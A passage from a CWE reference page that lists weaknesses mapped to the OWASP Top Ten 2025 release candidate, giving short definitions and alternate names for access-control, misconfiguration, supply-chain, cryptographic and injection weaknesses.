CWE VIEW: Weaknesses in OWASP Top Ten RC1 (2025)
CWE entries in this view (graph) are associated with the first release candidate (RC1) of the OWASP Top Ten, as released in 2025.
The following graph shows the tree-like relationships between
weaknesses that exist at different levels of abstraction. At the highest level, categories
and pillars exist to group weaknesses. Categories (which are not technically weaknesses) are
special CWE entries used to group weaknesses that share a common characteristic. Pillars are
weaknesses that are described in the most abstract fashion. Below these top-level entries
are weaknesses are varying levels of abstraction. Classes are still very abstract, typically
independent of any specific language or technology. Base level weaknesses are used to
present a more specific type of weakness. A variant is a weakness that is described at a
very low level of detail, typically limited to a specific language or technology. A chain is
a set of weaknesses that must be reachable consecutively in order to produce an exploitable
vulnerability. While a composite is a set of weaknesses that must all be present
simultaneously in order to produce an exploitable vulnerability.
Show Details:
1450 - Weaknesses in OWASP Top Ten RC1 (2025)
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1436
(OWASP Top Ten 2025 Category A01:2025 - Broken Access Control)
Weaknesses in this category are related to the A01 category "Broken Access Control" in the OWASP Top Ten 2025.
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1436
(OWASP Top Ten 2025 Category A01:2025 - Broken Access Control) >
1275
(Sensitive Cookie with Improper SameSite Attribute)
The SameSite attribute for sensitive cookies is not set, or an insecure value is used.
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1436
(OWASP Top Ten 2025 Category A01:2025 - Broken Access Control) >
200
(Exposure of Sensitive Information to an Unauthorized Actor)
The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information.
Information Disclosure
Information Leak
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1436
(OWASP Top Ten 2025 Category A01:2025 - Broken Access Control) >
201
(Insertion of Sensitive Information Into Sent Data)
The code transmits data to another actor, but a portion of the data includes sensitive information that should not be accessible to that actor.
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1436
(OWASP Top Ten 2025 Category A01:2025 - Broken Access Control) >
219
(Storage of File with Sensitive Data Under Web Root)
The product stores sensitive data under the web document root with insufficient access control, which might make it accessible to untrusted parties.
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1436
(OWASP Top Ten 2025 Category A01:2025 - Broken Access Control) >
22
(Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal'))
The product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory.
Directory traversal
Path traversal
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1436
(OWASP Top Ten 2025 Category A01:2025 - Broken Access Control) >
23
(Relative Path Traversal)
The product uses external input to construct a pathname that should be within a restricted directory, but it does not properly neutralize sequences such as ".." that can resolve to a location that is outside of that directory.
Zip Slip
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1436
(OWASP Top Ten 2025 Category A01:2025 - Broken Access Control) >
276
(Incorrect Default Permissions)
During installation, installed file permissions are set to allow anyone to modify those files.
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1436
(OWASP Top Ten 2025 Category A01:2025 - Broken Access Control) >
281
(Improper Preservation of Permissions)
The product does not preserve permissions or incorrectly preserves permissions when copying, restoring, or sharing objects, which can cause them to have less restrictive permissions than intended.
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1436
(OWASP Top Ten 2025 Category A01:2025 - Broken Access Control) >
282
(Improper Ownership Management)
The product assigns the wrong ownership, or does not properly verify the ownership, of an object or resource.
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1436
(OWASP Top Ten 2025 Category A01:2025 - Broken Access Control) >
283
(Unverified Ownership)
The product does not properly verify that a critical resource is owned by the proper entity.
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1436
(OWASP Top Ten 2025 Category A01:2025 - Broken Access Control) >
284
(Improper Access Control)
The product does not restrict or incorrectly restricts access to a resource from an unauthorized actor.
Authorization
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1436
(OWASP Top Ten 2025 Category A01:2025 - Broken Access Control) >
285
(Improper Authorization)
The product does not perform or incorrectly performs an authorization check when an actor attempts to access a resource or perform an action.
AuthZ
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1436
(OWASP Top Ten 2025 Category A01:2025 - Broken Access Control) >
352
(Cross-Site Request Forgery (CSRF))
The web application does not, or cannot, sufficiently verify whether a request was intentionally provided by the user who sent the request, which could have originated from an unauthorized actor.
Session Riding
Cross Site Reference Forgery
XSRF
CSRF
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1436
(OWASP Top Ten 2025 Category A01:2025 - Broken Access Control) >
359
(Exposure of Private Personal Information to an Unauthorized Actor)
The product does not properly prevent a person's private, personal information from being accessed by actors who either (1) are not explicitly authorized to access the information or (2) do not have the implicit consent of the person about whom the information is collected.
Privacy violation
Privacy leak / Privacy leakage
PPI
PII
PHI
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1436
(OWASP Top Ten 2025 Category A01:2025 - Broken Access Control) >
36
(Absolute Path Traversal)
The product uses external input to construct a pathname that should be within a restricted directory, but it does not properly neutralize absolute path sequences such as "/abs/path" that can resolve to a location that is outside of that directory.
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1436
(OWASP Top Ten 2025 Category A01:2025 - Broken Access Control) >
377
(Insecure Temporary File)
Creating and using insecure temporary files can leave application and system data vulnerable to attack.
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1436
(OWASP Top Ten 2025 Category A01:2025 - Broken Access Control) >
379
(Creation of Temporary File in Directory with Insecure Permissions)
The product creates a temporary file in a directory whose permissions allow unintended actors to determine the file's existence or otherwise access that file.
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1436
(OWASP Top Ten 2025 Category A01:2025 - Broken Access Control) >
402
(Transmission of Private Resources into a New Sphere ('Resource Leak'))
The product makes resources available to untrusted parties when those resources are only intended to be accessed by the product.
Resource Leak
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1436
(OWASP Top Ten 2025 Category A01:2025 - Broken Access Control) >
424
(Improper Protection of Alternate Path)
The product does not sufficiently protect all possible paths that a user can take to access restricted functionality or resources.
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1436
(OWASP Top Ten 2025 Category A01:2025 - Broken Access Control) >
425
(Direct Request ('Forced Browsing'))
The web application does not adequately enforce appropriate authorization on all restricted URLs, scripts, or files.
forced browsing
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1436
(OWASP Top Ten 2025 Category A01:2025 - Broken Access Control) >
441
(Unintended Proxy or Intermediary ('Confused Deputy'))
The product receives a request, message, or directive from an upstream component, but the product does not sufficiently preserve the original source of the request before forwarding the request to an external actor that is outside of the product's control sphere. This causes the product to appear to be the source of the request, leading it to act as a proxy or other intermediary between the upstream component and the external actor.
Confused Deputy
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1436
(OWASP Top Ten 2025 Category A01:2025 - Broken Access Control) >
497
(Exposure of Sensitive System Information to an Unauthorized Control Sphere)
The product does not properly prevent sensitive system-level information from being accessed by unauthorized actors who do not have the same level of access to the underlying system as the product does.
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1436
(OWASP Top Ten 2025 Category A01:2025 - Broken Access Control) >
538
(Insertion of Sensitive Information into Externally-Accessible File or Directory)
The product places sensitive information into files or directories that are accessible to actors who are allowed to have access to the files, but not to the sensitive information.
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1436
(OWASP Top Ten 2025 Category A01:2025 - Broken Access Control) >
540
(Inclusion of Sensitive Information in Source Code)
Source code on a web server or repository often contains sensitive information and should generally not be accessible to users.
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1436
(OWASP Top Ten 2025 Category A01:2025 - Broken Access Control) >
548
(Exposure of Information Through Directory Listing)
The product inappropriately exposes a directory listing with an index of all the resources located inside of the directory.
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1436
(OWASP Top Ten 2025 Category A01:2025 - Broken Access Control) >
552
(Files or Directories Accessible to External Parties)
The product makes files or directories accessible to unauthorized actors, even though they should not be.
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1436
(OWASP Top Ten 2025 Category A01:2025 - Broken Access Control) >
566
(Authorization Bypass Through User-Controlled SQL Primary Key)
The product uses a database table that includes records that should not be accessible to an actor, but it executes a SQL statement with a primary key that can be controlled by that actor.
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1436
(OWASP Top Ten 2025 Category A01:2025 - Broken Access Control) >
59
(Improper Link Resolution Before File Access ('Link Following'))
The product attempts to access a file based on the filename, but it does not properly prevent that filename from identifying a link or shortcut that resolves to an unintended resource.
insecure temporary file
Zip Slip
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1436
(OWASP Top Ten 2025 Category A01:2025 - Broken Access Control) >
601
(URL Redirection to Untrusted Site ('Open Redirect'))
The web application accepts a user-controlled input that specifies a link to an external site, and uses that link in a redirect.
Open Redirect
Cross-site Redirect
Cross-domain Redirect
Unvalidated Redirect
Drive-by download
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1436
(OWASP Top Ten 2025 Category A01:2025 - Broken Access Control) >
61
(UNIX Symbolic Link (Symlink) Following)
The product, when opening a file or directory, does not sufficiently account for when the file is a symbolic link that resolves to a target outside of the intended control sphere. This could allow an attacker to cause the product to operate on unauthorized files.
Symlink following
symlink vulnerability
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1436
(OWASP Top Ten 2025 Category A01:2025 - Broken Access Control) >
615
(Inclusion of Sensitive Information in Source Code Comments)
While adding general comments is very useful, some programmers tend to leave important data, such as: filenames related to the web application, old links or links which were not meant to be browsed by users, old code fragments, etc.
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1436
(OWASP Top Ten 2025 Category A01:2025 - Broken Access Control) >
639
(Authorization Bypass Through User-Controlled Key)
The system's authorization functionality does not prevent one user from gaining access to another user's data or record by modifying the key value identifying the data.
Insecure Direct Object Reference / IDOR
Broken Object Level Authorization / BOLA
Horizontal Authorization
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1436
(OWASP Top Ten 2025 Category A01:2025 - Broken Access Control) >
65
(Windows Hard Link)
The product, when opening a file or directory, does not sufficiently handle when the name is associated with a hard link to a target that is outside of the intended control sphere. This could allow an attacker to cause the product to operate on unauthorized files.
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1436
(OWASP Top Ten 2025 Category A01:2025 - Broken Access Control) >
668
(Exposure of Resource to Wrong Sphere)
The product exposes a resource to the wrong control sphere, providing unintended actors with inappropriate access to the resource.
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1436
(OWASP Top Ten 2025 Category A01:2025 - Broken Access Control) >
732
(Incorrect Permission Assignment for Critical Resource)
The product specifies permissions for a security-critical resource in a way that allows that resource to be read or modified by unintended actors.
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1436
(OWASP Top Ten 2025 Category A01:2025 - Broken Access Control) >
749
(Exposed Dangerous Method or Function)
The product provides an Applications Programming Interface (API) or similar interface for interaction with external actors, but the interface includes a dangerous method or function that is not properly restricted.
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1436
(OWASP Top Ten 2025 Category A01:2025 - Broken Access Control) >
862
(Missing Authorization)
The product does not perform an authorization check when an actor attempts to access a resource or perform an action.
AuthZ
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1436
(OWASP Top Ten 2025 Category A01:2025 - Broken Access Control) >
863
(Incorrect Authorization)
The product performs an authorization check when an actor attempts to access a resource or perform an action, but it does not correctly perform the check.
AuthZ
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1436
(OWASP Top Ten 2025 Category A01:2025 - Broken Access Control) >
918
(Server-Side Request Forgery (SSRF))
The web server receives a URL or similar request from an upstream component and retrieves the contents of this URL, but it does not sufficiently ensure that the request is being sent to the expected destination.
XSPA
SSRF
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1436
(OWASP Top Ten 2025 Category A01:2025 - Broken Access Control) >
922
(Insecure Storage of Sensitive Information)
The product stores sensitive information without properly limiting read or write access by unauthorized actors.
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1437
(OWASP Top Ten 2025 Category A02:2025 - Security Misconfiguration)
Weaknesses in this category are related to the A02 category "Security Misconfiguration" in the OWASP Top Ten 2025.
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1437
(OWASP Top Ten 2025 Category A02:2025 - Security Misconfiguration) >
1004
(Sensitive Cookie Without 'HttpOnly' Flag)
The product uses a cookie to store sensitive information, but the cookie is not marked with the HttpOnly flag.
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1437
(OWASP Top Ten 2025 Category A02:2025 - Security Misconfiguration) >
11
(ASP.NET Misconfiguration: Creating Debug Binary)
Debugging messages help attackers learn about the system and plan a form of attack.
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1437
(OWASP Top Ten 2025 Category A02:2025 - Security Misconfiguration) >
1174
(ASP.NET Misconfiguration: Improper Model Validation)
The ASP.NET application does not use, or incorrectly uses, the model validation framework.
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1437
(OWASP Top Ten 2025 Category A02:2025 - Security Misconfiguration) >
13
(ASP.NET Misconfiguration: Password in Configuration File)
Storing a plaintext password in a configuration file allows anyone who can read the file access to the password-protected resource making them an easy target for attackers.
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1437
(OWASP Top Ten 2025 Category A02:2025 - Security Misconfiguration) >
15
(External Control of System or Configuration Setting)
One or more system settings or configuration elements can be externally controlled by a user.
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1437
(OWASP Top Ten 2025 Category A02:2025 - Security Misconfiguration) >
16
(Configuration)
Weaknesses in this category are typically introduced during the configuration of the software.
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1437
(OWASP Top Ten 2025 Category A02:2025 - Security Misconfiguration) >
260
(Password in Configuration File)
The product stores a password in a configuration file that might be accessible to actors who do not know the password.
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1437
(OWASP Top Ten 2025 Category A02:2025 - Security Misconfiguration) >
315
(Cleartext Storage of Sensitive Information in a Cookie)
The product stores sensitive information in cleartext in a cookie.
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1437
(OWASP Top Ten 2025 Category A02:2025 - Security Misconfiguration) >
489
(Active Debug Code)
The product is released with debugging code still enabled or active.
Leftover debug code
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1437
(OWASP Top Ten 2025 Category A02:2025 - Security Misconfiguration) >
5
(J2EE Misconfiguration: Data Transmission Without Encryption)
Information sent over a network can be compromised while in transit. An attacker may be able to read or modify the contents if the data are sent in plaintext or are weakly encrypted.
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1437
(OWASP Top Ten 2025 Category A02:2025 - Security Misconfiguration) >
526
(Cleartext Storage of Sensitive Information in an Environment Variable)
The product uses an environment variable to store unencrypted sensitive information.
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1437
(OWASP Top Ten 2025 Category A02:2025 - Security Misconfiguration) >
547
(Use of Hard-coded, Security-relevant Constants)
The product uses hard-coded constants instead of symbolic names for security-critical values, which increases the likelihood of mistakes during code maintenance or security policy change.
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1437
(OWASP Top Ten 2025 Category A02:2025 - Security Misconfiguration) >
611
(Improper Restriction of XML External Entity Reference)
The product processes an XML document that can contain XML entities with URIs that resolve to documents outside of the intended sphere of control, causing the product to embed incorrect documents into its output.
XXE
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1437
(OWASP Top Ten 2025 Category A02:2025 - Security Misconfiguration) >
614
(Sensitive Cookie in HTTPS Session Without 'Secure' Attribute)
The Secure attribute for sensitive cookies in HTTPS sessions is not set.
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1437
(OWASP Top Ten 2025 Category A02:2025 - Security Misconfiguration) >
776
(Improper Restriction of Recursive Entity References in DTDs ('XML Entity Expansion'))
The product uses XML documents and allows their structure to be defined with a Document Type Definition (DTD), but it does not properly control the number of recursive definitions of entities.
XEE
Billion Laughs Attack
XML Bomb
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1437
(OWASP Top Ten 2025 Category A02:2025 - Security Misconfiguration) >
942
(Permissive Cross-domain Security Policy with Untrusted Domains)
The product uses a web-client protection
mechanism such as a Content Security Policy (CSP) or
cross-domain policy file, but the policy includes untrusted
domains with which the web client is allowed to
communicate.
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1438
(OWASP Top Ten 2025 Category A03:2025 - Software Supply Chain Failures)
Weaknesses in this category are related to the A03 category "Software Supply Chain Failures" in the OWASP Top Ten 2025.
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1438
(OWASP Top Ten 2025 Category A03:2025 - Software Supply Chain Failures) >
1035
(OWASP Top Ten 2017 Category A9 - Using Components with Known Vulnerabilities)
Weaknesses in this category are related to the A9 category in the OWASP Top Ten 2017.
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1438
(OWASP Top Ten 2025 Category A03:2025 - Software Supply Chain Failures) >
1104
(Use of Unmaintained Third Party Components)
The product relies on third-party components that are not
actively supported or maintained by the original developer or a trusted proxy
for the original developer.
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1438
(OWASP Top Ten 2025 Category A03:2025 - Software Supply Chain Failures) >
1329
(Reliance on Component That is Not Updateable)
The product contains a component that cannot be updated or patched in order to remove vulnerabilities or significant bugs.
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1438
(OWASP Top Ten 2025 Category A03:2025 - Software Supply Chain Failures) >
1395
(Dependency on Vulnerable Third-Party Component)
The product has a dependency on a third-party component that contains one or more known vulnerabilities.
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1438
(OWASP Top Ten 2025 Category A03:2025 - Software Supply Chain Failures) >
447
(Unimplemented or Unsupported Feature in UI)
A UI function for a security feature appears to be supported and gives feedback to the user that suggests that it is supported, but the underlying functionality is not implemented.
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1438
(OWASP Top Ten 2025 Category A03:2025 - Software Supply Chain Failures) >
477
(Use of Obsolete Function)
The code uses deprecated or obsolete functions, which suggests that the code has not been actively reviewed or maintained.
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1439
(OWASP Top Ten 2025 Category A04:2025 - Cryptographic Failures)
Weaknesses in this category are related to the A04 category "Cryptographic Failures" in the OWASP Top Ten 2025.
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1439
(OWASP Top Ten 2025 Category A04:2025 - Cryptographic Failures) >
1240
(Use of a Cryptographic Primitive with a Risky Implementation)
To fulfill the need for a cryptographic primitive, the product implements a cryptographic algorithm using a non-standard, unproven, or disallowed/non-compliant cryptographic implementation.
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1439
(OWASP Top Ten 2025 Category A04:2025 - Cryptographic Failures) >
1241
(Use of Predictable Algorithm in Random Number Generator)
The device uses an algorithm that is predictable and generates a pseudo-random number.
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1439
(OWASP Top Ten 2025 Category A04:2025 - Cryptographic Failures) >
261
(Weak Encoding for Password)
Obscuring a password with a trivial encoding does not protect the password.
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1439
(OWASP Top Ten 2025 Category A04:2025 - Cryptographic Failures) >
296
(Improper Following of a Certificate's Chain of Trust)
The product does not follow, or incorrectly follows, the chain of trust for a certificate back to a trusted root certificate, resulting in incorrect trust of any resource that is associated with that certificate.
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1439
(OWASP Top Ten 2025 Category A04:2025 - Cryptographic Failures) >
319
(Cleartext Transmission of Sensitive Information)
The product transmits sensitive or security-critical data in cleartext in a communication channel that can be sniffed by unauthorized actors.
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1439
(OWASP Top Ten 2025 Category A04:2025 - Cryptographic Failures) >
320
(Key Management Errors)
Weaknesses in this category are related to errors in the management of cryptographic keys.
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1439
(OWASP Top Ten 2025 Category A04:2025 - Cryptographic Failures) >
321
(Use of Hard-coded Cryptographic Key)
The product uses a hard-coded, unchangeable cryptographic key.
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1439
(OWASP Top Ten 2025 Category A04:2025 - Cryptographic Failures) >
322
(Key Exchange without Entity Authentication)
The product performs a key exchange with an actor without verifying the identity of that actor.
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1439
(OWASP Top Ten 2025 Category A04:2025 - Cryptographic Failures) >
323
(Reusing a Nonce, Key Pair in Encryption)
Nonces should be used for the present occasion and only once.
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1439
(OWASP Top Ten 2025 Category A04:2025 - Cryptographic Failures) >
324
(Use of a Key Past its Expiration Date)
The product uses a cryptographic key or password past its expiration date, which diminishes its safety significantly by increasing the timing window for cracking attacks against that key.
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1439
(OWASP Top Ten 2025 Category A04:2025 - Cryptographic Failures) >
325
(Missing Cryptographic Step)
The product does not implement a required step in a cryptographic algorithm, resulting in weaker encryption than advertised by the algorithm.
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1439
(OWASP Top Ten 2025 Category A04:2025 - Cryptographic Failures) >
326
(Inadequate Encryption Strength)
The product stores or transmits sensitive data using an encryption scheme that is theoretically sound, but is not strong enough for the level of protection required.
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1439
(OWASP Top Ten 2025 Category A04:2025 - Cryptographic Failures) >
327
(Use of a Broken or Risky Cryptographic Algorithm)
The product uses a broken or risky cryptographic algorithm or protocol.
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1439
(OWASP Top Ten 2025 Category A04:2025 - Cryptographic Failures) >
328
(Use of Weak Hash)
The product uses an algorithm that produces a digest (output value) that does not meet security expectations for a hash function that allows an adversary to reasonably determine the original input (preimage attack), find another input that can produce the same hash (2nd preimage attack), or find multiple inputs that evaluate to the same hash (birthday attack).
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1439
(OWASP Top Ten 2025 Category A04:2025 - Cryptographic Failures) >
329
(Generation of Predictable IV with CBC Mode)
The product generates and uses a predictable initialization Vector (IV) with Cipher Block Chaining (CBC) Mode, which causes algorithms to be susceptible to dictionary attacks when they are encrypted under the same key.
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1439
(OWASP Top Ten 2025 Category A04:2025 - Cryptographic Failures) >
330
(Use of Insufficiently Random Values)
The product uses insufficiently random numbers or values in a security context that depends on unpredictable numbers.
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1439
(OWASP Top Ten 2025 Category A04:2025 - Cryptographic Failures) >
331
(Insufficient Entropy)
The product uses an algorithm or scheme that produces insufficient entropy, leaving patterns or clusters of values that are more likely to occur than others.
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1439
(OWASP Top Ten 2025 Category A04:2025 - Cryptographic Failures) >
332
(Insufficient Entropy in PRNG)
The lack of entropy available for, or used by, a Pseudo-Random Number Generator (PRNG) can be a stability and security threat.
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1439
(OWASP Top Ten 2025 Category A04:2025 - Cryptographic Failures) >
334
(Small Space of Random Values)
The number of possible random values is smaller than needed by the product, making it more susceptible to brute force attacks.
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1439
(OWASP Top Ten 2025 Category A04:2025 - Cryptographic Failures) >
335
(Incorrect Usage of Seeds in Pseudo-Random Number Generator (PRNG))
The product uses a Pseudo-Random Number Generator (PRNG) but does not correctly manage seeds.
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1439
(OWASP Top Ten 2025 Category A04:2025 - Cryptographic Failures) >
336
(Same Seed in Pseudo-Random Number Generator (PRNG))
A Pseudo-Random Number Generator (PRNG) uses the same seed each time the product is initialized.
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1439
(OWASP Top Ten 2025 Category A04:2025 - Cryptographic Failures) >
337
(Predictable Seed in Pseudo-Random Number Generator (PRNG))
A Pseudo-Random Number Generator (PRNG) is initialized from a predictable seed, such as the process ID or system time.
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1439
(OWASP Top Ten 2025 Category A04:2025 - Cryptographic Failures) >
338
(Use of Cryptographically Weak Pseudo-Random Number Generator (PRNG))
The product uses a Pseudo-Random Number Generator (PRNG) in a security context, but the PRNG's algorithm is not cryptographically strong.
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1439
(OWASP Top Ten 2025 Category A04:2025 - Cryptographic Failures) >
340
(Generation of Predictable Numbers or Identifiers)
The product uses a scheme that generates numbers or identifiers that are more predictable than required.
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1439
(OWASP Top Ten 2025 Category A04:2025 - Cryptographic Failures) >
342
(Predictable Exact Value from Previous Values)
An exact value or random number can be precisely predicted by observing previous values.
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1439
(OWASP Top Ten 2025 Category A04:2025 - Cryptographic Failures) >
347
(Improper Verification of Cryptographic Signature)
The product does not verify, or incorrectly verifies, the cryptographic signature for data.
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1439
(OWASP Top Ten 2025 Category A04:2025 - Cryptographic Failures) >
523
(Unprotected Transport of Credentials)
Login pages do not use adequate measures to protect the user name and password while they are in transit from the client to the server.
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1439
(OWASP Top Ten 2025 Category A04:2025 - Cryptographic Failures) >
757
(Selection of Less-Secure Algorithm During Negotiation ('Algorithm Downgrade'))
A protocol or its implementation supports interaction between multiple actors and allows those actors to negotiate which algorithm should be used as a protection mechanism such as encryption or authentication, but it does not select the strongest algorithm that is available to both parties.
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1439
(OWASP Top Ten 2025 Category A04:2025 - Cryptographic Failures) >
759
(Use of a One-Way Hash without a Salt)
The product uses a one-way cryptographic hash against an input that should not be reversible, such as a password, but the product does not also use a salt as part of the input.
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1439
(OWASP Top Ten 2025 Category A04:2025 - Cryptographic Failures) >
760
(Use of a One-Way Hash with a Predictable Salt)
The product uses a one-way cryptographic hash against an input that should not be reversible, such as a password, but the product uses a predictable salt as part of the input.
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1439
(OWASP Top Ten 2025 Category A04:2025 - Cryptographic Failures) >
780
(Use of RSA Algorithm without OAEP)
The product uses the RSA algorithm but does not incorporate Optimal Asymmetric Encryption Padding (OAEP), which might weaken the encryption.
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1439
(OWASP Top Ten 2025 Category A04:2025 - Cryptographic Failures) >
916
(Use of Password Hash With Insufficient Computational Effort)
The product generates a hash for a password, but it uses a scheme that does not provide a sufficient level of computational effort that would make password cracking attacks infeasible or expensive.
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1440
(OWASP Top Ten 2025 Category A05:2025 - Injection)
Weaknesses in this category are related to the A05 category "Injection" in the OWASP Top Ten 2025.
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1440
(OWASP Top Ten 2025 Category A05:2025 - Injection) >
103
(Struts: Incomplete validate() Method Definition)
The product has a validator form that either does not define a validate() method, or defines a validate() method but does not call super.validate().
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1440
(OWASP Top Ten 2025 Category A05:2025 - Injection) >
104
(Struts: Form Bean Does Not Extend Validation Class)
If a form bean does not extend an ActionForm subclass of the Validator framework, it can expose the application to other weaknesses related to insufficient input validation.
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1440
(OWASP Top Ten 2025 Category A05:2025 - Injection) >
112
(Missing XML Validation)
The product accepts XML from an untrusted source but does not validate the XML against the proper schema.
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1440
(OWASP Top Ten 2025 Category A05:2025 - Injection) >
113
(Improper Neutralization of CRLF Sequences in HTTP Headers ('HTTP Request/Response Splitting'))
The product receives data from an HTTP agent/component (e.g., web server, proxy, browser, etc.), but it does not neutralize or incorrectly neutralizes CR and LF characters before the data is included in outgoing HTTP headers.
HTTP Request Splitting
HTTP Response Splitting
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1440
(OWASP Top Ten 2025 Category A05:2025 - Injection) >
114
(Process Control)
Executing commands or loading libraries from an untrusted source or in an untrusted environment can cause an application to execute malicious commands (and payloads) on behalf of an attacker.
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1440
(OWASP Top Ten 2025 Category A05:2025 - Injection) >
115
(Misinterpretation of Input)
The product misinterprets an input, whether from an attacker or another product, in a security-relevant fashion.
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1440
(OWASP Top Ten 2025 Category A05:2025 - Injection) >
116
(Improper Encoding or Escaping of Output)
The product prepares a structured message for communication with another component, but encoding or escaping of the data is either missing or done incorrectly. As a result, the intended structure of the message is not preserved.
Output Sanitization
Output Validation
Output Encoding
1450
(Weaknesses in OWASP Top Ten RC1 (2025)) >
1440
(OWASP Top Ten 2025 Category A05:2025 - Injection) >
129
(Improper Validation of Array Index)
The product uses untrusted input when calculating or using an array index, but the product does not validate or incorrectly validates the index to ensure the index references a valid position within the array.
out-of-bounds array index
index-out-of-range
array index underflow
1450
